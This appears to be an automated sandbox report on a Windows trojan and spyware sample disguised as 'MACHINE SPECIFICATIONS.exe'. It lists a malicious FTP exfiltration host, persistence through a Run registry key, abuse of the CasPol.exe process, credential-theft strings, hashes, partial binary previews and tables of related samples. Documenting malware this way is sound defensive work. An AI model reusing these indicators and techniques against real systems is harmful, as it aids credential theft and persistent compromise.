                    http://xgrPBN.comCasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://ftp.electrobist.comCasPol.exe, 0000000A.00000002.772635350.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.772655142.0000000002B6A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://api.ipify.orgftp://ftp.electrobist.comuser1CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://DynDns.comDynDNSnamejidpasswordPsi/PsiCasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      51.195.62.160
                      ftp.electrobist.comFrance
                      16276OVHFRtrue
                      3.220.57.224
                      api.ipify.org.herokudns.comUnited States
                      14618AMAZON-AESUSfalse
                      IP
                      192.168.2.1
                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:755960
                      Start date and time:2022-11-29 11:18:06 +01:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 9m 46s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:MACHINE SPECIFICATIONS.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:20
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@7/5@3/3
                      EGA Information:
                      • Successful, ratio: 33.3%
                      HDC Information:Failed
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 107
                      • Number of non-executed functions: 6
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240s for sample files taking high CPU consumption
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 67.27.158.254, 8.248.135.254, 8.241.123.126, 8.248.143.254, 67.27.157.254
                      • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net
                      • Execution Graph export aborted for target newapp.exe, PID 4272 because it is empty
                      • Execution Graph export aborted for target newapp.exe, PID 676 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      TimeTypeDescription
                      11:19:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run newapp C:\Users\user\AppData\Roaming\newapp\newapp.exe
                      11:20:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run newapp C:\Users\user\AppData\Roaming\newapp\newapp.exe
                      11:20:12API Interceptor1137x Sleep call for process: CasPol.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      51.195.62.160vbc.exeGet hashmaliciousBrowse
                      • www.strongdigits.com/n8it/?hXkTC=9rmD_BYXon&O48HJZ7=8T2Uslqj793E8Rx0A6tAbHvegSoBRNrTkrL5sa6LhEisP65VVN1ZTCOFs+PiSTeKib/u
                      3.220.57.224swYA5v1F5o.exeGet hashmaliciousBrowse
                      • api.ipify.org/
                      SecuriteInfo.com.Win32.PWSX-gen.8053.6874.exeGet hashmaliciousBrowse
                      • api.ipify.org/
                      xDUOL3tAR4.exeGet hashmaliciousBrowse
                      • api.ipify.org/?format=txt
                      CnkGKVQ63n.exeGet hashmaliciousBrowse
                      • api.ipify.org/?format=txt
                      masslogger.bin.exeGet hashmaliciousBrowse
                      • api.ipify.org/
                      SecuriteInfo.com.Trojan.PWS.Siggen3.24449.27201.30669.exeGet hashmaliciousBrowse
                      • api.ipify.org/
                      iirWPHKXWA.exeGet hashmaliciousBrowse
                      • api.ipify.org/
                      iirWPHKXWA.exeGet hashmaliciousBrowse
                      • api.ipify.org/
                      library_1.exeGet hashmaliciousBrowse
                      • api.ipify.org/?format=xml
                      MPW3FZULO3.exeGet hashmaliciousBrowse
                      • api.ipify.org/?format=xml
                      #U00d6deme kopyas#U0131.exeGet hashmaliciousBrowse
                      • api.ipify.org/
                      na.exeGet hashmaliciousBrowse
                      • api.ipify.org/
                      IMG0001909022.vbsGet hashmaliciousBrowse
                      • api.ipify.org/
                      SecuriteInfo.com.W32.Trojan.FSDO-8208.24884.exeGet hashmaliciousBrowse
                      • api.ipify.org/
                      Qivwb1V6g1.exeGet hashmaliciousBrowse
                      • api.ipify.org/
                      UC8CT2nqw6.exeGet hashmaliciousBrowse
                      • api.ipify.org/
                      ConsoleApp8.exeGet hashmaliciousBrowse
                      • api.ipify.org/
                      SecuriteInfo.com.Trojan.GenericKD.50428043.31193.exeGet hashmaliciousBrowse
                      • api.ipify.org/
                      helf.hpl.dllGet hashmaliciousBrowse
                      • api.ipify.org/
                      Z27PH1HZ6U.docGet hashmaliciousBrowse
                      • api.ipify.org/
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      api.ipify.org.herokudns.comSecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exeGet hashmaliciousBrowse
                      • 54.91.59.199
                      MEPS-42.exeGet hashmaliciousBrowse
                      • 3.232.242.170
                      ORDER.exeGet hashmaliciousBrowse
                      • 52.20.78.240
                      SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exeGet hashmaliciousBrowse
                      • 52.20.78.240
                      DHJ59300948.xlsGet hashmaliciousBrowse
                      • 3.232.242.170
                      Quotation.exeGet hashmaliciousBrowse
                      • 54.91.59.199
                      Cg7vRuVKhI.exeGet hashmaliciousBrowse
                      • 3.232.242.170
                      SecuriteInfo.com.Win32.CrypterX-gen.12789.377.exeGet hashmaliciousBrowse
                      • 3.232.242.170
                      Wzf4gWTOC2.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      SecuriteInfo.com.W32.MSIL_Kryptik.ILD.gen.Eldorado.12870.1146.exeGet hashmaliciousBrowse
                      • 54.91.59.199
                      SecuriteInfo.com.Win32.PWSX-gen.7585.24753.exeGet hashmaliciousBrowse
                      • 3.232.242.170
                      SecuriteInfo.com.Win32.PWSX-gen.25304.17510.exeGet hashmaliciousBrowse
                      • 52.20.78.240
                      SecuriteInfo.com.BackDoor.SpyBotNET.25.24486.13932.exeGet hashmaliciousBrowse
                      • 54.91.59.199
                      buH9VrC1dQ.exeGet hashmaliciousBrowse
                      • 54.91.59.199
                      PO-08784 xlsx.vbeGet hashmaliciousBrowse
                      • 54.91.59.199
                      KWIR000714988.exeGet hashmaliciousBrowse
                      • 54.91.59.199
                      Attach Qoute.exeGet hashmaliciousBrowse
                      • 54.91.59.199
                      SWIFT Payment W076001.exeGet hashmaliciousBrowse
                      • 52.20.78.240
                      file.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      Ordine n.47201 pdf.vbsGet hashmaliciousBrowse
                      • 52.20.78.240
                      c-0001.c-msedge.netIwutiwno.dll.dllGet hashmaliciousBrowse
                      • 13.107.4.50
                      kW1RcHd3Np.exeGet hashmaliciousBrowse
                      • 13.107.4.50
                      Urgent quote request -pdf-.exeGet hashmaliciousBrowse
                      • 13.107.4.50
                      094089010-094098574-1669343495-1669343493-2332.htmlGet hashmaliciousBrowse
                      • 13.107.4.50
                      LhLntDLA0i.exeGet hashmaliciousBrowse
                      • 13.107.4.50
                      stGLUBW7kG.exeGet hashmaliciousBrowse
                      • 13.107.4.50
                      file.exeGet hashmaliciousBrowse
                      • 13.107.4.50
                      I8Kmld8K8U.exeGet hashmaliciousBrowse
                      • 13.107.4.50
                      CamScanner-397841.exeGet hashmaliciousBrowse
                      • 13.107.4.50
                      UPDATED SOA (2).exeGet hashmaliciousBrowse
                      • 13.107.4.50
                      2022#U5e74#U4e2a#U4eba#U52b3#U52a8#U8865#U8d34.docx.docGet hashmaliciousBrowse
                      • 13.107.4.50
                      REMITTANCE COPY.exeGet hashmaliciousBrowse
                      • 13.107.4.50
                      TNT Invoice_pdf.exeGet hashmaliciousBrowse
                      • 13.107.4.50
                      n2cFuTcuzL.exeGet hashmaliciousBrowse
                      • 13.107.4.50
                      file.exeGet hashmaliciousBrowse
                      • 13.107.4.50
                      SecuriteInfo.com.Trojan.PackedNET.1617.17943.11881.exeGet hashmaliciousBrowse
                      • 13.107.4.50
                      SecuriteInfo.com.W32.A-62389890.Eldorado.4706.2477.exeGet hashmaliciousBrowse
                      • 13.107.4.50
                      file.exeGet hashmaliciousBrowse
                      • 13.107.4.50
                      PO-SKT112322011.xlsGet hashmaliciousBrowse
                      • 13.107.4.50
                      invoice.exeGet hashmaliciousBrowse
                      • 13.107.4.50
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      AMAZON-AESUSSecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exeGet hashmaliciousBrowse
                      • 54.91.59.199
                      MEPS-42.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      ORDER.exeGet hashmaliciousBrowse
                      • 52.20.78.240
                      SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exeGet hashmaliciousBrowse
                      • 52.20.78.240
                      DHJ59300948.xlsGet hashmaliciousBrowse
                      • 3.232.242.170
                      Quotation.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      Cg7vRuVKhI.exeGet hashmaliciousBrowse
                      • 3.232.242.170
                      SecuriteInfo.com.Win32.CrypterX-gen.12789.377.exeGet hashmaliciousBrowse
                      • 3.232.242.170
                      Wzf4gWTOC2.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      SecuriteInfo.com.W32.MSIL_Kryptik.ILD.gen.Eldorado.12870.1146.exeGet hashmaliciousBrowse
                      • 54.91.59.199
                      SecuriteInfo.com.Win32.PWSX-gen.7585.24753.exeGet hashmaliciousBrowse
                      • 3.232.242.170
                      SecuriteInfo.com.Win32.PWSX-gen.25304.17510.exeGet hashmaliciousBrowse
                      • 52.20.78.240
                      https://ipfs.io/ipfs/QmZscYPiZiEyUufsiTp73rjGySUVKx6mbYrEnns9n7DNVh?filename=ownredirectautoweb.html#news@pitchfork.comGet hashmaliciousBrowse
                      • 34.233.165.88
                      https://app.smartsheet.com/b/download/att/1/7953430800033668/2d1kcfy3a3mgsxdrbomrc9v3joGet hashmaliciousBrowse
                      • 34.239.40.100
                      https://linktfetn.ccGet hashmaliciousBrowse
                      • 52.86.202.16
                      http://url4483.sosadiazeventos.com/ls/click?upn=mXPGTXlLlQcgRVh-2F4Dp38fDRGJMmpWDEH-2FE76VgzzHi8nDM-2FDFm088Y0fZh2YEo3911s_enYX4alLiJIZDBGIDabCChe307NCTtptA6FkWYSB3j5V6OhBzgfspKVbV4JVvzGdBg-2FpfIDbModFw6pwZbxUwOIH920HTdp04aJvbH-2BiE9HXzSLKkYY-2BQwN2k3tfS1dLZiMlWWHBIONkLNSv-2FImW2JVPUHpzjWGgnR15xLUdZiK3LrL1QwISGwkykQ0r7Gx9gXXzyzrOEbYDB0YUT3HYJ9KcMPT87DhnXEWe46sjqEA-3DGet hashmaliciousBrowse
                      • 34.226.96.6
                      https://firerite1-my.sharepoint.com/:o:/g/personal/luke_firerite_co_uk/EgX55biPFdZEjA-OHgYPtTQBt8i3-MO-Jg7Sa3pYTRp-_Q?e=5%3aStgzAn&at=9Get hashmaliciousBrowse
                      • 54.85.178.36
                      http://www.fpat.infoGet hashmaliciousBrowse
                      • 52.201.0.9
                      SecuriteInfo.com.BackDoor.SpyBotNET.25.24486.13932.exeGet hashmaliciousBrowse
                      • 52.20.78.240
                      buH9VrC1dQ.exeGet hashmaliciousBrowse
                      • 52.20.78.240
                      OVHFRDHJ59300948.xlsGet hashmaliciousBrowse
                      • 188.165.213.20
                      Wzf4gWTOC2.exeGet hashmaliciousBrowse
                      • 188.165.213.20
                      35JTigDQD0.elfGet hashmaliciousBrowse
                      • 149.56.12.10
                      https://ipfs.io/ipfs/QmZscYPiZiEyUufsiTp73rjGySUVKx6mbYrEnns9n7DNVh?filename=ownredirectautoweb.html#news@pitchfork.comGet hashmaliciousBrowse
                      • 51.89.9.254
                      https://paper.li/lnMHi8ZFENoxtKejQDZMh/story/document-confidential-m8ZkThqLiTXweW3JUxcg2Get hashmaliciousBrowse
                      • 37.187.86.201
                      8kH56VSq58.elfGet hashmaliciousBrowse
                      • 192.99.71.226
                      file.exeGet hashmaliciousBrowse
                      • 5.135.247.111
                      BL-NO-OOLU2136901180.vbsGet hashmaliciousBrowse
                      • 213.186.33.5
                      Services_Jingce_Quotation28112022.exeGet hashmaliciousBrowse
                      • 149.56.23.213
                      file.exeGet hashmaliciousBrowse
                      • 5.135.247.111
                      justificante de transferencia.vbeGet hashmaliciousBrowse
                      • 164.132.238.203
                      file.exeGet hashmaliciousBrowse
                      • 5.135.247.111
                      file.exeGet hashmaliciousBrowse
                      • 5.135.247.111
                      file.exeGet hashmaliciousBrowse
                      • 5.135.247.111
                      file.exeGet hashmaliciousBrowse
                      • 5.135.247.111
                      file.exeGet hashmaliciousBrowse
                      • 139.99.27.222
                      Facture.htmlGet hashmaliciousBrowse
                      • 51.81.165.16
                      https://sdsando.com/0o0o/?bGVvLmRlZXBhbkB1cy5ndC5jb20Get hashmaliciousBrowse
                      • 51.79.197.167
                      file.exeGet hashmaliciousBrowse
                      • 5.135.247.111
                      Quote.jsGet hashmaliciousBrowse
                      • 51.79.9.164
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      MEPS-42.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      11-29-22.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      ORDER.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      Quotation.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      Ziraat-bankasiSwiftMessaji2911202245344.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      Cg7vRuVKhI.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      SecuriteInfo.com.Win32.PWSX-gen.7918.18477.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      SecuriteInfo.com.Win32.CrypterX-gen.12789.377.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      Wzf4gWTOC2.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      AWB DHL 7214306201 Shipment.pdf (432).exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      WxuqCcSnq2.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      SecuriteInfo.com.W32.MSIL_Kryptik.ILD.gen.Eldorado.12870.1146.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      SecuriteInfo.com.Win32.PWSX-gen.7585.24753.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      zoomx64.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      zoomx64.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      SecuriteInfo.com.Win32.PWSX-gen.25304.17510.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      k5cfjUZeT2.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      SkyNet.1448.exeGet hashmaliciousBrowse
                      • 3.220.57.224
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      C:\Users\user\AppData\Roaming\newapp\newapp.exeSecuriteInfo.com.W64.Agent.FIC.gen.Eldorado.1956.16034.exeGet hashmaliciousBrowse
                        SecuriteInfo.com.W64.Agent.FIC.gen.Eldorado.14198.17336.exeGet hashmaliciousBrowse
                          SecuriteInfo.com.MSIL.GenKryptik.GCPV.tr.20538.12237.exeGet hashmaliciousBrowse
                            SecuriteInfo.com.Trojan.PackedNET.1680.17253.14925.exeGet hashmaliciousBrowse
                              SecuriteInfo.com.Win64.CrypterX-gen.23326.16714.exeGet hashmaliciousBrowse
                                QUOTATION.exeGet hashmaliciousBrowse
                                  RFQ11202022-SOEC.exeGet hashmaliciousBrowse
                                    RFQ11192022-SOEC.exeGet hashmaliciousBrowse
                                      bSPRpBND9K.exeGet hashmaliciousBrowse
                                        H691qJujAI.exeGet hashmaliciousBrowse
                                          19723088.exeGet hashmaliciousBrowse
                                            x9Q9JmaeUH.exeGet hashmaliciousBrowse
                                              RFQ11142.EXE.exeGet hashmaliciousBrowse
                                                QUOTATION.exeGet hashmaliciousBrowse
                                                  RFQ11132022-SOEC.exeGet hashmaliciousBrowse
                                                    QUOTATION.exeGet hashmaliciousBrowse
                                                      QUOTATION.exeGet hashmaliciousBrowse
                                                        5f88991.exeGet hashmaliciousBrowse
                                                          SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                            SPECIFICATIONS.IMGGet hashmaliciousBrowse
                                                              Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                              File Type:CSV text
                                                              Category:dropped
                                                              Size (bytes):654
                                                              Entropy (8bit):5.374391981354885
                                                              Encrypted:false
                                                              SSDEEP:12:Q3La/KDLI4MWuPTxAIOKbbDLI4MWuPOKN08JOKhap+92n4MNQpN9tv:ML9E4KrgKDE4KGKN08AKh6+84xpNT
                                                              MD5:C8A62E39DE7A3F805D39384E8BABB1E0
                                                              SHA1:B32B1257401F17A2D1D5D3CC1D8C1E072E3FEE31
                                                              SHA-256:A7BC127854C5327ABD50C86000BF10586B556A5E085BB23523B07A15DD4C5383
                                                              SHA-512:7DB2825131F5CDA6AF33A179D9F7CD0A206FF34AE50D6E66DE9E99BE2CD1CB985B88C00F0EDE72BBC4467E7E42B5DC6132403AA2EC1A0A7A6D11766C438B10C3
                                                              Malicious:true
                                                              Reputation:moderate, very likely benign file
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\f2e0589ed6d670f264a5f65dd0ad000f\Microsoft.VisualBasic.ni.dll",0..
                                                              Process:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):42
                                                              Entropy (8bit):4.0050635535766075
                                                              Encrypted:false
                                                              SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                              MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                              SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                              SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                              SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):107624
                                                              Entropy (8bit):5.882571203162287
                                                              Encrypted:false
                                                              SSDEEP:1536:oSF7vA1hRqHixxMjlI34j8p2mdc/6A4vW/CU1RPMRVQJE:/A1hDPMip2mdcyA4vW/JRPMLQW
                                                              MD5:F866FC1C2E928779C7119353C3091F0C
                                                              SHA1:70D06064E2F12CFB10A82BC985F86F58EA7A4138
                                                              SHA-256:67F3FC243C58EEAE55BDDC22CE025B7841A89ACA2E201B999D8C0E4F07D177B8
                                                              SHA-512:B28B10801580726B85AB5F796EA26835648A3ACFBE1FBA95DFC687439B43FF9548BD3AB9EFC85D88FC071D232718BCFFAC614CC5BFF159173996A3D2AB22154D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Joe Sandbox View:
                                                              • Filename: SecuriteInfo.com.W64.Agent.FIC.gen.Eldorado.1956.16034.exe, Detection: malicious, Browse
                                                              • Filename: SecuriteInfo.com.W64.Agent.FIC.gen.Eldorado.14198.17336.exe, Detection: malicious, Browse
                                                              • Filename: SecuriteInfo.com.MSIL.GenKryptik.GCPV.tr.20538.12237.exe, Detection: malicious, Browse
                                                              • Filename: SecuriteInfo.com.Trojan.PackedNET.1680.17253.14925.exe, Detection: malicious, Browse
                                                              • Filename: SecuriteInfo.com.Win64.CrypterX-gen.23326.16714.exe, Detection: malicious, Browse
                                                              • Filename: QUOTATION.exe, Detection: malicious, Browse
                                                              • Filename: RFQ11202022-SOEC.exe, Detection: malicious, Browse
                                                              • Filename: RFQ11192022-SOEC.exe, Detection: malicious, Browse
                                                              • Filename: bSPRpBND9K.exe, Detection: malicious, Browse
                                                              • Filename: H691qJujAI.exe, Detection: malicious, Browse
                                                              • Filename: 19723088.exe, Detection: malicious, Browse
                                                              • Filename: x9Q9JmaeUH.exe, Detection: malicious, Browse
                                                              • Filename: RFQ11142.EXE.exe, Detection: malicious, Browse
                                                              • Filename: QUOTATION.exe, Detection: malicious, Browse
                                                              • Filename: RFQ11132022-SOEC.exe, Detection: malicious, Browse
                                                              • Filename: QUOTATION.exe, Detection: malicious, Browse
                                                              • Filename: QUOTATION.exe, Detection: malicious, Browse
                                                              • Filename: 5f88991.exe, Detection: malicious, Browse
                                                              • Filename: SPECIFICATIONS.exe, Detection: malicious, Browse
                                                              • Filename: SPECIFICATIONS.IMG, Detection: malicious, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...rX.Z..............0..X...........v... ........@.. ..............................Q.....`.................................<v..O.......$............f..h>...........u............................................... ............... ..H............text....V... ...X.................. ..`.rsrc...$............Z..............@..@.reloc...............d..............@..B................pv......H.......,...`...............xE...t......................................2~P....o....*.r...p(....*VrK..p(....s.....P...*..0.._.......~....:O....>.....%.rm..p...A...s......su....%.r...p...A...s....rm..p.su....%.r...p...B...s......su....%.r...p...B...s....r...p.su....%.r...p...C...s......su....%.r...p...C...s....r...p.su....%.r...p...D...s......su....%.r...p...D...s....r...p.su....%.r...p...E...s......su....%..r...p...E...s....r...p.su....%..r...p...F...s......su....%..r...p...F
                                                              Process:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):486
                                                              Entropy (8bit):5.064987733454706
                                                              Encrypted:false
                                                              SSDEEP:12:z30U30b4BFNY8fNFquci7S1pE+DPOCN6+QOH5JyY:z3F3g4DO4UE+Tz5JB
                                                              MD5:30394F72BB157162F35A2DEB1F48BD1A
                                                              SHA1:66AD7D748F42C64E0698606A8F019D165DE657E8
                                                              SHA-256:133FABF0CD558FA3E5144E9EF35654FA0422F8424C6D5D82828B8D10EC9BA295
                                                              SHA-512:A93E12D6C9927403FE0E20B8A698B24007EBCCD53A29AD65428366C6CE3CED05E5F3AEFF1D46C7D9F174EAEAE5059F0B5D12353B6022965CDC5D187E45FA72E9
                                                              Malicious:false
                                                              Preview:Microsoft .NET Framework CasPol 4.7.3056.0..for Microsoft .NET Framework version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....WARNING: The .NET Framework does not apply CAS policy by default. Any settings shown or modified by CasPol will only ..affect applications that opt into using CAS policy. ....Please see http://go.microsoft.com/fwlink/?LinkId=131738 for more information. ......ERROR: Not enough arguments....For usage information, use 'caspol -?'..
                                                              File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.979738488629949
                                                              TrID:
                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                              • DOS Executable Generic (2002/1) 0.92%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:MACHINE SPECIFICATIONS.exe
                                                              File size:523776
                                                              MD5:92945d0a2731ef771ea9d10c792e03e1
                                                              SHA1:1eeef600b7b51ce7aa93e825be55b40f3ef8e319
                                                              SHA256:46b61250c34b38d26ac5897217e6b70a222ff16318161c4e67c74c74491cc612
                                                              SHA512:33ff6835de8b3a4a0002669deb68acf14a770e7546c2250eb6cdcde2ad4841891f504faa77427e864d1b7758481864189039beb8ec9d926f5804bd7da30a5fb2
                                                              SSDEEP:12288:BxNQOgJk4hl4vPE1suvqvku873X9BsILNILZoRPzre:BxNi6MlzX9BsILNILZoFre
                                                              TLSH:F7B4235560BB2097E21682344A275FA211E4AE2325E6BD4FE3DCBD0F5F732402E39766
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...$..c.........."...0......B........... ....@...... .......................@............`................................
                                                              Icon Hash:c49a0894909c6494
                                                              Entrypoint:0x400000
                                                              Entrypoint Section:
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x63800824 [Fri Nov 25 00:11:16 2022 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:
                                                              Instruction
                                                              dec ebp
                                                              pop edx
                                                              nop
                                                              add byte ptr [ebx], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], al
                                                              add byte ptr [eax], al
                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x7e0000x40a0.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x7d8640x1c.text
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000x7b8d30x7ba00False0.9942492416582407data7.996815914318105IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rsrc0x7e0000x40a00x4200False0.4485677083333333data5.797210494950491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              NameRVASizeTypeLanguageCountry
                                                              RT_ICON0x7e1900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024
                                                              RT_ICON0x7e5f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096
                                                              RT_ICON0x7f6a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216
                                                              RT_GROUP_ICON0x81c480x30data
                                                              RT_VERSION0x81c780x23cdata
